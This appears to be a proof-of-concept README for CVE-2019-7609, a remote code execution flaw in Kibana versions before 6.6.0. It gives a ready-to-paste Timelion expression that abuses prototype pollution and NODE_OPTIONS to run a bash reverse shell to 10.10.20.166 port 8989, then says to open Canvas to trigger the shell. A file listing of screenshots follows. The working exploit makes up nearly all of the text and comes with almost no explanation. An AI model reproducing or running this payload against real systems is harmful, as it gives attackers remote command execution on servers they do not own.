kibana < 6.6.0 未授权远程代码命令执行 (Need Timelion And Canvas),CVE-2019-7609# CVE-2019-7609 kibana-RCE <6.6.0 未授权远程代码命令执行 (Need Timelion And Canvas)

## 0x01 Timelion Run
```
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/10.10.20.166/8989 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
```


## 0x02 Click Canvas to getshell

[4.0K] /data/pocs/6a9c8666de2e1f7504543cd90743784322839303
├── [425K] Canvas.jpg
├── [220K] kibana_RCE.gif
├── [ 446] README.md
├── [303K] Timelion.jpg
└── [128K] version.jpg
0 directories, 5 files